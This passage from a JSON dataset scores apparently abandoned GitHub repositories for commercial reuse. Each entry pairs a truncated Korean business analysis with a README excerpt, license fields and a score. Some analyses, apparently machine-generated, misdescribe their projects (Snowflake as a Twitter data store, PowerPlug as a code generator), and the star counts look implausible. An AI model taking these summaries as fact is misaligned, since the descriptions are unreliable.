화면 전환 효과를 구현할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 대시보드의 차트나 숫자가 부드럽게 변하는 효과를 제공하는 분석 플랫폼\n2. **내부 업무 도구*","readme_excerpt":"# React-Motion\n\n[![Build Status](https://travis-ci.org/chenglou/react-motion.svg?branch=master)](https://travis-ci.org/chenglou/react-motion)\n[![npm version](https://badge.fury.io/js/react-motion.svg)](https://www.npmjs.com/package/react-motion)\n[![Bower version](https://badge.fury.io/bo/react-motion.svg)](http://badge.fury.io/bo/react-motion)\n[![react-motion channel on discord](https://img.shields.io/badge/discord-react--motion%40reactiflux-738bd7.svg?style=flat)](https://discordapp.com/invite/0ZcbPKXt5bYzmcI0)\n\n```js\nimport {Motion, spring} from 'react-motion';\n// In your render...\n<Motion defaultStyle={{x: 0}} style={{x: spring(10)}}>\n  {value => <div>{value.x}</div>}\n</Motion>\n```\n\nAnimate a counter from `0` to `10`. For more advanced usage, see below.\n\n### Install\n\n- Npm: `npm install --save react-motion`\n\n- Bower: **do not install with `bower install react-motion`, it won't work**. Use `bower install --save https://unpkg.com/react-motion/bower.zip`. Or in `bower.json`:\n```json\n{\n","composite_score":0.3462,"license_safety_tag":"safe"},{"name":"donnemartin/dev-setup","github_url":"https://github.com/donnemartin/dev-setup","stars":7,"language":"Python","license":"NOASSERTION","abandonment_months":39,"description":"# dev-setup 저장소 분석\n\n## 왜 보물인가\n컴퓨터를 처음 쓰는 개발자도 필요한 프로그램들을 자동으로 설치하고 설정할 수 있게 도와주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **회사 온보딩 SaaS**: 신입 개발자가 입사 첫날 노트북 설정에 며칠 걸리는 문제를 하루 만에 해결해주는 서비스\n2. **교육 기관 내부 도구**: 대학 프로그래밍","readme_excerpt":"dev-setup\n============\n\n<p align=\"center\">\n  <img src=\"https://raw.githubusercontent.com/donnemartin/dev-setup-resources/master/res/repo-header.gif\">\n</p>\n\n## Motivation\n\nSetting up a new developer machine can be an **ad-hoc, manual, and time-consuming** process.  `dev-setup` aims to **simplify** the process with **easy-to-understand instructions** and **dotfiles/scripts** to **automate the setup** of the following:\n\n* **OS X updates and Xcode Command Line Tools**\n* **OS X defaults** geared towards developers\n* **Developer tools**: Vim, bash, tab completion, curl, git, GNU core utils, Python, Ruby, etc\n* **Developer apps**: iTerm2, Sublime Text, Atom, VirtualBox, Vagrant, Docker, Chrome, etc\n* **Python data analysis**: IPython Notebook, NumPy, Pandas, Scikit-Learn, Matplotlib, etc\n* **Big Data platforms**: Spark (with IPython Notebook integration) and MapReduce\n* **Cloud services**: Amazon Web Services (Boto, AWS CLI, S3cmd, etc) and Heroku\n* **Common data stores**: MySQL, PostgreSQL, ","composite_score":0.346,"license_safety_tag":"unknown"},{"name":"ltsopensource/light-task-scheduler","github_url":"https://github.com/ltsopensource/light-task-scheduler","stars":6,"language":"Java","license":"apache-2.0","abandonment_months":44,"description":"# Light Task Scheduler 상용화 분석\n\n## 왜 보물인가\n반복되는 작업을 자동으로 실행하는 시스템으로, 기업들이 수작업을 줄이고 생산성을 높이는 데 핵심 역할을 할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 기반 업무 자동화 플랫폼으로 제공하여 기업 고객들이 정기적인 데이터 처리, 이메일 발송, 보고서 생","readme_excerpt":"\r\n# LTS用户文档\r\n\t\r\nLTS(light-task-scheduler)主要用于解决分布式任务调度问题，支持实时任务，定时任务和Cron任务。有较好的伸缩性，扩展性，健壮稳定性而被多家公司使用，同时也希望开源爱好者一起贡献。\r\n\r\n## ---> 底部有招人帖 \r\n\r\n## 项目地址\r\ngithub地址:\r\n[https://github.com/ltsopensource/light-task-scheduler](https://github.com/ltsopensource/light-task-scheduler)\r\n\r\noschina地址:\r\n[http://git.oschina.net/hugui/light-task-scheduler](http://git.oschina.net/hugui/light-task-scheduler)\r\n\r\n例子: \r\n[https://github.com/ltsopensource/lts-examples](https://github.com/ltsopensource/lts-examples)\r\n\r\n文档地址(正在更新中,后面以这个为准):\r\n[https://www.gitbook.com/book/qq254963746/lts/details](https://www.gitbook.com/book/qq254963746/lts/details)\r\n\r\n这两个地址都会同步更新。感兴趣，请加QQ群：109500214 (加群密码: hello world)一起探讨、完善。越多人支持，就越有动力去更新，喜欢记得右上角star哈。\r\n\r\n## 1.7.2-SNAPSHOT(master)变更主要点\r\n1. 优化JobContext中的BizLogger，由原来的去掉了threadlocal，解决taskTracker多线程的问题, 去掉LtsLoggerFactory.getLogger()用法\r\n\r\n## 框架概况\r\nLTS 有主要有以下四种节点：\r\n\r\n* JobClient：主要负责提交任务, 并接收任务执行反馈结果。\r\n* JobTracker：负责接收并分配任务，任务调度。\r\n* TaskTracker：负责执行任务，执行完反馈给JobTracker。\r\n* LTS-Admi","composite_score":0.3458,"license_safety_tag":"safe"},{"name":"TaylanTatli/Moon","github_url":"https://github.com/TaylanTatli/Moon","stars":5,"language":"HTML","license":"mit","abandonment_months":22,"description":"# TaylanTatli/Moon 분석 리포트\n\n## 왜 보물인가\n웹사이트를 아름답게 꾸밀 수 있는 디자인 테마로, 전문가 수준의 외형을 코딩 없이 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **블로그 호스팅 SaaS**: 사용자가 선택해서 자신의 블로그에 적용할 수 있는 프리미엄 테마 판매\n2. **웹사이트 빌더 내부 도구**: 자체 웹사이트 제","readme_excerpt":"# Moon Jekyll Theme \n\n> [!WARNING]\n> ###### A NEW HOME FOR MOON!\n> \n> You can access new repository from [here](https://github.com/TolgaTatli/Moonrise/).\n---\n\n**[Moon](https://tolgatatli.github.io/Moon)** is a minimal, one column jekyll theme.\n\n## Features\n* Minimal, you can focus on your content\n* Responsive\n* Disqus integration\n* Syntax highlighting\n* Optional post image\n* Social icons\n* Page for sharing projects\n* Optional background image\n* Simple navigation menu\n* MathJax support\n\n## Preview\n\n![screenshot of Moon](https://cloud.githubusercontent.com/assets/754514/14509720/61c61058-01d6-11e6-93ab-0918515ecd56.png)    \n![screenshot of Moon](https://cloud.githubusercontent.com/assets/754514/14509716/61ac6c8e-01d6-11e6-879f-8308883de790.png)\n\nSee a [live version of Moon](https://tolgatatli.github.io/Moon) hosted on GitHub.\n\n## Getting Started\n\nTo learn how to install and use this theme check out the [Setup Guide](https://tolgatatli.github.io/Moon/moon-theme/) for more information.\n","composite_score":0.3458,"license_safety_tag":"safe"},{"name":"iMeiji/shadowsocks_install","github_url":"https://github.com/iMeiji/shadowsocks_install","stars":7,"language":"","license":"unknown","abandonment_months":100,"description":"# shadowsocks_install 저장소 분석\n\n## 왜 보물인가\n인터넷 접속을 우회하는 기술을 자동으로 설치해주는 도구로, 접근 제한이 있는 지역이나 환경에서 필요로 하는 사람들에게 실질적인 가치가 있습니다.\n\n## 어디에 쓸 수 있나\n1. **VPN/우회 서비스 SaaS**: 자동 설치 기능을 추가하여 비기술자도 쉽게 사용 가능한 우회 접속 서비스","readme_excerpt":"根据相关法律法规和政策，部分搜索结果未予显示。","composite_score":0.3456,"license_safety_tag":"unknown"},{"name":"auduno/clmtrackr","github_url":"https://github.com/auduno/clmtrackr","stars":6,"language":"JavaScript","license":"mit","abandonment_months":78,"description":"# clmtrackr 분석 리포트\n\n## 왜 보물인가\n웹캠만으로 사람의 얼굴 움직임과 표정을 자동으로 감지하고 추적할 수 있는 기술로, 별도의 특수 장비 없이 누구나 사용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 온라인 피팅 SaaS**\n가상 메이크업, 안경 시착, 헤어스타일 미리보기 서비스로 고객이 구매 전 상품을 자신의 얼굴에 직접 입혀볼 ","readme_excerpt":"clmtrackr\n======\n\n[![npm version](https://img.shields.io/npm/v/clmtrackr.svg)](https://www.npmjs.com/package/clmtrackr)\n\n![tracked face](https://auduno.github.io/clmtrackr/examples/media/clmtrackr_03.jpg)\n\n**clmtrackr** is a javascript library for fitting facial models to faces in videos or images. It currently is an implementation of *constrained local models* fitted by *regularized landmark mean-shift*, as described in [Jason M. Saragih's paper](http://dl.acm.org/citation.cfm?id=1938021). **clmtrackr** tracks a face and outputs the coordinate positions of the face model as an array, following the numbering of the model below:\n\n[![facemodel_numbering](https://auduno.github.io/clmtrackr/examples/media/facemodel_numbering_new_small.png)](https://auduno.github.io/clmtrackr/examples/media/facemodel_numbering_new.png)\n\n[Reference](http://auduno.github.io/clmtrackr/docs/reference.html) - [Overview](https://www.auduno.com/2014/01/05/fitting-faces/)\n\nThe library provides some generic face mod","composite_score":0.3456,"license_safety_tag":"safe"},{"name":"Nightonke/BoomMenu","github_url":"https://github.com/Nightonke/BoomMenu","stars":5,"language":"Java","license":"unknown","abandonment_months":39,"description":"# BoomMenu 프로젝트 분석\n\n## 왜 보물인가\n스마트폰 앱에서 버튼을 누르면 화려하게 펼쳐지는 메뉴 디자인을 쉽게 만들 수 있는 기술로, 사용자 경험을 한 단계 업그레이드할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **음식 배달 앱 SaaS**: 주문 옵션을 펼치는 메뉴 UI로 사용자 만족도 증대\n2. **프로젝트 관리 내부 도구**: 작업 추","readme_excerpt":"# BoomMenu \n[![Developer](https://img.shields.io/badge/Developer-Nightonke-red.svg)](https://github.com/Nightonke)\n[![Demo](https://img.shields.io/badge/Demo-Download-orange.svg)](https://github.com/Nightonke/BoomMenu/blob/master/Apk/BoomMenu%20V2.1.1.apk?raw=true)\n[![Download](https://api.bintray.com/packages/nightonke/maven/boommenu/images/download.svg)](https://bintray.com/nightonke/maven/boommenu)\n[![Lisense](https://img.shields.io/badge/License-Apache%202-lightgrey.svg)](https://www.apache.org/licenses/LICENSE-2.0)\n\n## 2.0.0 Comes Finally\n\nApproximately 8 months ago, I got an inspiration to creating something that can boom and show menu, which I named it Boom-Menu-Button, BMB. But at that time, I just a fresh-man in Android, knowing little about designing. The codes I wrote serveral months ago are ugly and performed low-efficient.\n\nBetween months, I always think about BMB and try to write a better design pattern for implements of BMB. My first try is [BMB-iOS](https://github.com/N","composite_score":0.3455,"license_safety_tag":"unknown"},{"name":"high-speed-downloader/high-speed-downloader","github_url":"https://github.com/high-speed-downloader/high-speed-downloader","stars":11,"language":"","license":"unknown","abandonment_months":59,"description":"# high-speed-downloader 가치 평가\n\n## 왜 보물인가\n인터넷에서 파일을 빠르게 내려받는 기술로, 영상·음악·대용량 파일이 필요한 서비스들이 항상 찾는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **동영상 스트리밍 플랫폼** - 사용자가 영화나 드라마를 더 빠르게 받을 수 있게 해주는 백그라운드 기술\n2. **클라우드 저장소 서비스","readme_excerpt":"","composite_score":0.3455,"license_safety_tag":"unknown"},{"name":"hustcc/JS-Sorting-Algorithm","github_url":"https://github.com/hustcc/JS-Sorting-Algorithm","stars":5,"language":"Java","license":"unknown","abandonment_months":26,"description":"# JS-Sorting-Algorithm 상용화 분석\n\n## 왜 보물인가\n데이터를 빠르게 정렬하는 기본적인 알고리즘들을 모아놓은 라이브러리로, 웹 애플리케이션에서 대용량 데이터를 처리해야 하는 모든 서비스에 필수적입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 데이터 분석 도구**: 사용자가 업로드한 엑셀 파일이나 테이블 데이터를 실시간으로 정렬하는 ","readme_excerpt":"# 十大经典排序算法\n\n[![Build Status](https://travis-ci.org/hustcc/JS-Sorting-Algorithm.svg?branch=master)](https://travis-ci.org/hustcc/JS-Sorting-Algorithm)\n\n排序算法是《数据结构与算法》中最基本的算法之一。\n\n排序算法可以分为内部排序和外部排序，内部排序是数据记录在内存中进行排序，而外部排序是因排序的数据很大，一次不能容纳全部的排序记录，在排序过程中需要访问外存。常见的内部排序算法有：**插入排序、希尔排序、选择排序、冒泡排序、归并排序、快速排序、堆排序、基数排序**等。用一张图概括：\n\n![十大经典排序算法 概览截图](res/sort.png)\n\n\n**关于时间复杂度**：\n\n1. 平方阶 (O(n2)) 排序\n\t各类简单排序：直接插入、直接选择和冒泡排序。\n2. 线性对数阶 (O(nlog2n)) 排序\n\t快速排序、堆排序和归并排序；\n3. O(n1+§)) 排序，§ 是介于 0 和 1 之间的常数。\n    希尔排序\n4. 线性阶 (O(n)) 排序\n\t基数排序，此外还有桶、箱排序。\n\n\n**关于稳定性**：\n\n稳定的排序算法：冒泡排序、插入排序、归并排序和基数排序。\n\n不是稳定的排序算法：选择排序、快速排序、希尔排序、堆排序。\n\n\n**名词解释**：\n\n**n**：数据规模\n\n**k**：“桶”的个数\n\n**In-place**：占用常数内存，不占用额外内存\n\n**Out-place**：占用额外内存\n\n**稳定性**：排序后 2 个相等键值的顺序和排序之前它们的顺序相同\n\n----\n\n\n**GitBook 内容大纲**\n\n1. [冒泡排序](1.bubbleSort.md)\n2. [选择排序](2.selectionSort.md)\n3. [插入排序](3.insertionSort.md)\n4. [希尔排序](4.shellSort.md)\n5. [归并排序](5.mergeSort.md)\n6. [快速排序](6.quickSort.md)\n7. [堆排序](7.heapSort.md)\n8. [计数排序](8.countingSort.md)\n9. [桶排序](9.bucketSort.md)\n10. [基","composite_score":0.3453,"license_safety_tag":"unknown"},{"name":"lhartikk/naivechain","github_url":"https://github.com/lhartikk/naivechain","stars":17,"language":"JavaScript","license":"apache-2.0","abandonment_months":74,"description":"# naivechain 상품화 분석\n\n## 왜 보물인가\n블록체인의 핵심 원리를 간단하게 구현한 교육용 코드로, 암호화폐나 투명한 거래 기록이 필요한 비즈니스의 기초를 빠르게 이해하고 적용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **거래 기록 투명성이 필요한 SaaS**: 의약품 유통, 식품 공급망 추적 서비스처럼 제품의 출처와 이동 경로를 고객에게 ","readme_excerpt":"# Naivechain - a blockchain implementation in 200 lines of code\n\n### Motivation\nAll the current implementations of blockchains are tightly coupled with the larger context and problems they (e.g. Bitcoin or Ethereum) are trying to solve. This makes understanding blockchains a necessarily harder task, than it must be. Especially source-code-wisely. This project is an attempt to provide as concise and simple implementation of a blockchain as possible.\n\n \n### What is blockchain\n[From Wikipedia](https://en.wikipedia.org/wiki/Blockchain_(database)) : Blockchain is a distributed database that maintains a continuously-growing list of records called blocks secured from tampering and revision.\n\n### Key concepts of Naivechain\nCheck also [this blog post](https://medium.com/@lhartikk/a-blockchain-in-200-lines-of-code-963cc1cc0e54#.dttbm9afr5) for a more detailed overview of the key concepts\n* HTTP interface to control the node\n* Use Websockets to communicate with other nodes (P2P)\n* Super simple \"p","composite_score":0.3452,"license_safety_tag":"safe"},{"name":"exif-js/exif-js","github_url":"https://github.com/exif-js/exif-js","stars":5,"language":"JavaScript","license":"mit","abandonment_months":24,"description":"# exif-js 상용화 분석\n\n## 왜 보물인가\n사진에 숨겨진 촬영 정보(촬영날짜, 카메라 기종, 위치 등)를 웹에서 자동으로 읽어내는 기술로, 사진 관리나 부동산 사진 검증 등 다양한 비즈니스에 필수적입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 사진 관리 SaaS**: 사용자가 업로드한 사진을 자동 분류·정렬하는 클라우드 앨범 서비스\n2. **부","readme_excerpt":"# Exif.js\n\nA JavaScript library for reading [EXIF meta data](https://en.wikipedia.org/wiki/Exchangeable_image_file_format) from image files.\n\nYou can use it on images in the browser, either from an image or a file input element. Both EXIF and IPTC metadata are retrieved.\nThis package can also be used in AMD or CommonJS environments.\n\n**Note**: The EXIF standard applies only to `.jpg` and `.tiff` images. EXIF logic in this package is based on the EXIF standard v2.2 ([JEITA CP-3451, included in this repo](/spec/Exif2-2.pdf)).\n\n## Install\nInstall `exif-js` through [NPM](https://www.npmjs.com/#getting-started):\n\n    npm install exif-js --save    \n\nOr [Bower](http://bower.io/):\n\n    bower install exif-js --save\n\nThen add a `script` tag in your an HTML in the [best position](http://stackoverflow.com/questions/436411/where-is-the-best-place-to-put-script-tags-in-html-markup) referencing your local file.\n\n```html\n<script src=\"vendors/exif-js/exif-js\"></script>\n```\n\nYou can also use a minified ","composite_score":0.3452,"license_safety_tag":"safe"},{"name":"kangax/fabric.js","github_url":"https://github.com/kangax/fabric.js","stars":10,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# kangax/fabric.js 분석 보고서\n\n## 왜 보물인가\n웹사이트에서 그림을 그리고 편집할 수 있는 기능을 쉽게 만들어주는 도구로, 디자인 관련 서비스들이 필요로 하는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 로고 제작 SaaS**: 중소 사업자가 자신의 로고를 직접 디자인하고 수정할 수 있는 웹 서비스\n2. **협업 화이트보","readme_excerpt":"# Fabric.js\n\n<a href=\"http://fabricjs.com/kitchensink\" target=\"_blank\"><img align=\"right\" src=\"/lib/screenshot.png\" width=\"400\"></a>\n\nA **simple and powerful Javascript HTML5 canvas library**.\n\n- [**Website**][website]\n- [**Old V5 documentation**](https://fabric5.fabricjs.com)\n- [**GOTCHAS**][gotchas]\n- [**Contributing, Developing and More**](CONTRIBUTING.md)\n\n## Special Thanks\n\nHere is a section for recognition of companies or individuals that support fabricJS with a sponsorship\n\n   <a href=\"https://go.warp.dev/fabric\">\n      <img alt=\"Warp sponsorship\" width=\"300\" src=\"https://github.com/warpdotdev/brand-assets/blob/main/Github/Sponsor/Warp-Github-LG-01.png\">\n   </a>\n\n### [Warp, built for coding with multiple AI agents](https://go.warp.dev/fabric)\n\n[Available for MacOS, Linux, & Windows](https://go.warp.dev/fabric)<br>\n\n</div>\n\n## Features\n\n- Out of the box interactions such as scale, move, rotate, skew, group...\n- Built in shapes, controls, animations, image filters, gradients, patt","composite_score":0.3452,"license_safety_tag":"safe"},{"name":"renatorib/react-powerplug","github_url":"https://github.com/renatorib/react-powerplug","stars":29,"language":"JavaScript","license":"MIT","abandonment_months":3,"description":"# React PowerPlug 사업화 분석\n\n## 왜 보물인가\n웹 개발자들이 반복적으로 작성하는 상태 관리 코드를 자동으로 생성해주는 도구로, 개발 속도를 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 웹 빌더 플랫폼에서 개발자 사용자가 자동화된 코드 생성 기능으로 개발 시간 단축\n2. **내부 업무 도구**: 소프","readme_excerpt":"<h1 align=\"center\">\n  <img src=\"/logo.png\" alt=\"React PowerPlug\" />\n</h1>\n\n<p align=\"center\">\n  <a href=\"https://www.npmjs.com/package/react-powerplug\" target=\"_blank\">\n    <img src=\"https://img.shields.io/npm/dt/react-powerplug.svg?style=flat-square\" alt=\"npm\" />\n  </a>\n  <a href=\"https://github.com/renatorib/react-powerplug/stargazers\" target=\"_blank\">\n    <img src=\"https://img.shields.io/github/stars/renatorib/react-powerplug.svg?style=flat-square\" alt=\"stars\" />\n  </a>\n  <a href=\"https://twitter.com/intent/tweet?url=https://github.com/renatorib/react-powerplug\" target=\"_blank\">\n    <img src=\"https://img.shields.io/twitter/url/https/github.com/renatorib/react-powerplug.svg?style=flat-square\" alt=\"tweet\" />\n  </a>\n</p>\n\n<br />\n \n > **React PowerPlug is a set of pluggable renderless components and helpers** that provides different types of state and logic utilities that you can use with your dumb components. It creates state and passes down the logic to the children, so you can handle","composite_score":0.3452,"license_safety_tag":"safe"},{"name":"xcltapestry/XCL-Charts","github_url":"https://github.com/xcltapestry/XCL-Charts","stars":7,"language":"Java","license":"apache-2.0","abandonment_months":108,"description":"# XCL-Charts 평가 보고서\n\n## 왜 보물인가\n복잡한 데이터를 시각적으로 아름답게 표현하는 차트 도구로, 앱 개발자들이 쉽게 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 판매 현황, 회원 통계를 시각화해주는 대시보드 서비스로 월 구독료 청구\n2. **내부 업무 도구**: 기업의 재무 데이터, 판매량 추이를 자동으로","readme_excerpt":"XCL-Charts\n==========\n\n<b>XCL-Charts V2.4</b><br/>\n  Android开源图表库(XCL-Charts is a free charting library for Android platform.) <br/>\n &nbsp;&nbsp;&nbsp;&nbsp;XCL-Charts基于Android原生Canvas来绘制各种图表,使用简便,定制灵活。<br/>\n &nbsp;&nbsp;&nbsp;&nbsp;目前支持<b>(3D/非3D,背向式)柱形图(Bar Chart)、3D/非3D饼图(Pie Chart)、堆积图(Stacked Bar Chart)、面积图(Area Chart)、\n 折线图(Line Chart)、曲线图(Spline Chart)、环形图(Dount Chart)、南丁格尔玫瑰图(Rose Chart)、仪表盘(Dial Chart)、刻度盘(Gauge Chart)、雷达图(Radar Chart)、\n 圆形图(Circle Chart)、弧线比较图、散点图(Scatter Chart)、气泡图(Bubble Chart)、范围条形图(RangeBar Chart)、玫瑰风向图(Wind Rose)、象限图(Quadrant chart)、漏斗图(Funnel Chart)等图表。<br/>\n &nbsp;&nbsp;&nbsp;&nbsp;其它特性还包括手势缩放、图表滑动、点击交互、多图叠加、图表批注、动画效果、多XY轴显示、轴线任意方位显示、动态图例、图表参考线、柱图刻度对齐风格切换、混合图表及同数据源图表类型切换等。</b><br/> \n \n <b>License</b><br/>\n      采用Apache v2 License开源协议。<br/>\n \n  Mail: xcl_168@aliyun.com <br/>\n  Blog: http://blog.csdn.net/xcl168 <br/>\n QQ群: 374780627\n<br/> \nGitHub代码托管地址:\nhttps://github.com/xcltapestry/XCL-Charts <br/>\t\t\n\n图表库简要教程\nhttp://blog.csdn.net/xcl168/article/detai","composite_score":0.345,"license_safety_tag":"safe"},{"name":"Netflix/SimianArmy","github_url":"https://github.com/Netflix/SimianArmy","stars":5,"language":"Java","license":"apache-2.0","abandonment_months":91,"description":"# Netflix SimianArmy 분석\n\n## 왜 보물인가\nNetflix가 만든 클라우드 시스템 장애 테스트 도구로, 기업의 서비스 안정성을 미리 점검하는 일종의 \"보험\"입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 협업 도구 회사가 장애 발생 시에도 서비스가 멈추지 않도록 미리 테스트하는 데 사용\n2. **내부 업무 ","readme_excerpt":"[![NetflixOSS Lifecycle](https://img.shields.io/osslifecycle/Netflix/SimianArmy.svg)](OSSMETADATA)\n[![Build Status](https://travis-ci.org/Netflix/SimianArmy.svg?branch=master)](https://travis-ci.org/Netflix/SimianArmy)\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)\n\n## PROJECT STATUS: RETIRED\n\n**The Simian Army project is no longer actively maintained**. Some of the Simian\nArmy functionality has been moved to other Netflix projects:\n\n* A [newer version of Chaos Monkey](https://github.com/netflix/chaosmonkey) is available as a standalone service.\n* [Swabbie] is a new standalone service that will replace the functionality provided by Janitor Monkey.\n* Conformity Monkey functionality will be rolled into other [Spinnaker] backend services.\n\n\n[Swabbie]: https://github.com/spinnaker/swabbie\n[Spinnaker]: https://www.spinnaker.io/\n\n### DESCRIPTION\n\nThe Simian Army is a suite of tools for keeping your cloud operating in top\nf","composite_score":0.3449,"license_safety_tag":"safe"},{"name":"twitter-archive/snowflake","github_url":"https://github.com/twitter-archive/snowflake","stars":6,"language":"Scala","license":"unknown","abandonment_months":71,"description":"# twitter-archive/snowflake 상용화 분석\n\n## 왜 보물인가\n트위터의 대규모 데이터를 효율적으로 저장하고 관리할 수 있는 기술로, 소셜 미디어 데이터 분석이 필요한 모든 기업에게 실질적인 가치를 제공합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소셜 미디어 분석 플랫폼으로 기업의 트위터 피드를 자동 수집·분석해주는 구","readme_excerpt":"We have retired the initial release of Snowflake and working on open sourcing\nthe next version based on\n[Twitter-server](https://twitter.github.io/twitter-server/), in a form that can\nrun anywhere without requiring Twitter's own infrastructure services.\n\nThe initial version, released in 2010, was based on Apache Thrift and it\npredated [Finagle](https://twitter.github.io/finagle/), our building\nblock for RPC services at Twitter.  The Snowflake we're using internally is a\nfull rewrite and heavily relies on existing infrastructure at Twitter to run.\nWe cannot commit to a date but we're doing our best to add necessary features to\nmake Snowflake fit for many environments outside of Twitter.\n\nSource code is still in the repository and is reachable from\n[snowflake-2010](https://github.com/twitter/snowflake/releases/tag/snowflake-2010)\ntag.\n\nWe won't be accepting pull requests or responding to issues for the retired\nrelease.\n","composite_score":0.3448,"license_safety_tag":"unknown"},{"name":"linuxacademy/content-gitops","github_url":"https://github.com/linuxacademy/content-gitops","stars":32,"language":"Python","license":"NOASSERTION","abandonment_months":24,"description":"","readme_excerpt":"","composite_score":0.3447,"license_safety_tag":"unknown"},{"name":"wesbos/es6.io","github_url":"https://github.com/wesbos/es6.io","stars":6,"language":"HTML","license":"unknown","abandonment_months":41,"description":"# wesbos/es6.io 자산 분석\n\n## 왜 보물인가\n최신 웹 개발 언어인 자바스크립트를 배우고 싶어 하는 수백만 명의 초보자들을 위한 교육 콘텐츠 저장소입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 유데미, 코드아카데미 같은 곳에서 구조화된 강좌로 판매\n2. **회사 교육용 내부 도구**: 신입 개발자 온보딩 프로그램으로 운영","readme_excerpt":"![ES6 for Everyone](https://es6.io/images/es6-facebook-share.png?cool=yah)\n\n# ES6 for Everyone Starter Files\n\nEverything you need to Learn ES6 over at [ES6.io](https://ES6.io)\n","composite_score":0.3446,"license_safety_tag":"unknown"},{"name":"guipsamora/pandas_exercises","github_url":"https://github.com/guipsamora/pandas_exercises","stars":6,"language":"Jupyter Notebook","license":"BSD-3-Clause","abandonment_months":7,"description":"# pandas_exercises 저장소 분석\n\n## 왜 보물인가\n엑셀이나 데이터 분석을 배우려는 사람들을 위한 실습 자료 모음으로, 초보자도 단계적으로 데이터 다루는 법을 배울 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **온라인 교육 플랫폼**: 데이터 분석 입문 강좌의 실습 과제와 답안지를 제공하는 구독형 서비스\n- **기업 직원 교육**: 마케팅팀","readme_excerpt":"# Pandas Exercises\n\nFed up with a ton of tutorials but no easy way to find exercises I decided to create a repo just with exercises to practice pandas.\nDon't get me wrong, tutorials are great resources, but to learn is to do. So unless you practice you won't learn.\n\nThere will be three different types of files:  \n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1. Exercise instructions  \n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;2. Solutions without code  \n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;3. Solutions with code and comments\n\nMy suggestion is that you learn a topic in a tutorial, video or documentation and then do the first exercises.\nLearn one more topic and do more exercises. If you are stuck, don't go directly to the solution with code files. Check the solutions only and try to get the correct answer.\n\nSuggestions and collaborations are more than welcome.🙂 Please open an issue or make a PR indicating the exercise and your problem/solution.\n\n# Lessons\n\n|\t\t\t\t                                  |\t\t\t\t    ","composite_score":0.3445,"license_safety_tag":"safe"},{"name":"vurtun/nuklear","github_url":"https://github.com/vurtun/nuklear","stars":7,"language":"C","license":"unknown","abandonment_months":78,"description":"# Nuklear 저장소 분석\n\n## 왜 보물인가\n사용자 인터페이스를 만드는 데 필요한 기초 도구로, 게임이나 응용프로그램에서 버튼·메뉴 같은 화면 요소를 쉽게 구현할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **게임 개발 도구**: 게임 제작사들이 게임 내 메뉴와 설정 화면을 빠르게 만드는 SaaS 에디터로 제공\n2. **3D 모델링 소프트웨어","readme_excerpt":"# Nuklear\n\n## ALL DEVELOPMENT MOVED ELSEWHERE\n\nDear visitor,\n\nthis repository, issue tracker, etc. is abandoned in favor of https://github.com/Immediate-Mode-UI/Nuklear . Any activity in this issue tracker, any pull requests, etc. will be ignored.\n\nLooking forward to hearing from you in https://github.com/Immediate-Mode-UI/Nuklear\n\n*Nuklear community*\n\n[![Build Status](https://travis-ci.org/vurtun/nuklear.svg)](https://travis-ci.org/vurtun/nuklear)\n\nThis is a minimal state immediate mode graphical user interface toolkit\nwritten in ANSI C and licensed under public domain. It was designed as a simple\nembeddable user interface for application and does not have any dependencies,\na default render backend or OS window and input handling but instead provides a very modular\nlibrary approach by using simple input state for input and draw\ncommands describing primitive shapes as output. So instead of providing a\nlayered library that tries to abstract over a number of platform and\nrender backends ","composite_score":0.3443,"license_safety_tag":"unknown"},{"name":"kristoferjoseph/flexboxgrid","github_url":"https://github.com/kristoferjoseph/flexboxgrid","stars":7,"language":"HTML","license":"NOASSERTION","abandonment_months":69,"description":"# FlexboxGrid 프로젝트 분석\n\n## 왜 보물인가\n웹사이트를 만들 때 화면 크기에 맞게 자동으로 레이아웃을 조정해주는 기초 도구로, 초보자도 쉽게 사용할 수 있는 유용한 코드 모음입니다.\n\n## 어디에 쓸 수 있나\n- **노코드 웹빌더 서비스**: 드래그앤드롭으로 웹페이지를 만드는 플랫폼에 내장하여 반응형 레이아웃 기능 제공\n- **웹디자인 교육 ","readme_excerpt":"Flexbox Grid\n===========\n\n[flexboxgrid.com](http://flexboxgrid.com)\n\nGrid based on the `flex` display property.\n\nInstall\n---------\n### npm\n`npm i flexboxgrid --save`\n\n### bower\n`bower install flexboxgrid`\n### cdn\n\n<code>CDNJS</code>\n```html\n<link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/flexboxgrid/6.3.1/flexboxgrid.min.css\" type=\"text/css\" >\n```\n\n### css\n* [Development](https://raw.githubusercontent.com/kristoferjoseph/flexboxgrid/master/dist/flexboxgrid.css)\n* [Production](https://raw.githubusercontent.com/kristoferjoseph/flexboxgrid/master/dist/flexboxgrid.min.css)\n\nAdd the `flexboxgrid.css` __development__ or `flexboxgrid.min.css` __production__ to your html page.\n\n```html\n<link rel=\"stylesheet\" href=\"css/flexboxgrid.min.css\" type=\"text/css\">\n```\nInspiration\n-----------\n- [topcoat-grid](https://github.com/topcoat/grid)\n- [flexbox-grid by @zeMicro](https://github.com/zeMirco/flexbox-grid)\n- 